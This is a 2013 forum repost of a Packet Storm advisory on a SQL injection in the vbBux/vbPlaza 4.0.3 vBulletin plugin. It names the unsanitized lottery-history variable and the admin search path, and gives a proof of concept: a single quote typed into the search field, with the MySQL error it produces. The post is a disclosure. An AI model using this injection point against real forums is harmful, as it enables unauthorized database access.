Matt Posted August 12, 2013 Report Posted August 12, 2013 Description : vbBux / vbPlaza version 4.0.3 suffers from a remote SQL injection vulnerability.Author : n3tw0rkSource : vbBux / vbPlaza 4.0.3 SQL Injection ? Packet StormCode : # Exploit Title: vbBux and vbPlaza v4 SQLI ## Author(s): n3tw0rk (twiiter.com/n3tw0rkgod) ## Contact: Mail:infectedelite@gmail.com ## Product: 4.0.3 and below ## Software Version x.x.x ## Product Download:http://www.vbulletin.org/forum/showthread.php?t=270271## Homepage: d4tabase.com #_____________________________________________________________#The exploit is caused due to a variable named 'vbplaza_lottery_history' notbeing sanitized before being used within an insert into statement. POC You will need Admincp Access then go tohttp://localhost/admincp/vbplaza_lottery.php?do=searchhistory then in theforce read order column put a' into the search bar and result should showDatabase error in vBulletin 4.2.1:Invalid SQL:Database error in vBulletin 4.2.1Invalid SQL:SELECT COUNT(*) AS countFROM vbplaza_lottery_historyWHERE 1=1 AND (lotteryid = ');MySQL Error : You have an error in your SQL syntax; check the manual thatcorresponds to your MySQL server version for the right syntax to use near'')' at line 3Error Number : 1064Request Date : Sunday, August 11th 2013 @ 05:17:53 PMError Date : Sunday, August 11th 2013 @ 05:17:54 PMScript : http://localhost/admincp/vbplaza_lottery.php?do=findhistoryReferrer :http://localhost/admincp/vbplaza_lottery.php?do=searchhistoryIP Address : ::1Username : n3tw0rkClassname : vB_DatabaseMySQL Version : 5.5.27 Quote